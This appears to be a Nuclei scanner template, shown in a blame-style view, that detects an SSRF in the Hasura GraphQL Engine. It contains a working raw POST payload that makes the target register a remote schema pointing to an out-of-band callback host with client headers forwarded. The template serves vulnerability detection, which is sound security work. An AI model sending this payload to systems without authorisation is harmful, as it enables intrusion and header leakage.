2021-07-12 15:19:09 +00:00
|
|
|
id: hasura-graphql-ssrf
|
|
|
|
info:
|
|
|
|
name: Hasura GraphQL Engine - SSRF Side Request Forgery
|
|
|
|
author: princechaddha
|
|
|
|
severity: high
|
|
|
|
reference: https://cxsecurity.com/issue/WLB-2021040115
|
2021-08-02 16:33:12 +00:00
|
|
|
tags: hasura,ssrf
|
2021-07-12 15:19:09 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /v1/query HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Length: 381
|
|
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
|
|
|
content-type: application/json
|
|
|
|
Accept: */*
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
Accept-Language: en-US,en;q=0.9
|
|
|
|
Connection: close
|
|
|
|
|
|
|
|
{
|
2021-07-13 10:27:10 +00:00
|
|
|
"type":"bulk",
|
|
|
|
"args":[
|
|
|
|
{
|
|
|
|
"type":"add_remote_schema",
|
|
|
|
"args":{
|
|
|
|
"name":"test",
|
|
|
|
"definition":{
|
|
|
|
"url":"https://{{interactsh-url}}",
|
|
|
|
"headers":[
|
|
|
|
],
|
|
|
|
"timeout_seconds":60,
|
|
|
|
"forward_client_headers":true
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
]
|
|
|
|
}
|
2021-07-12 15:19:09 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 400
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "http"
|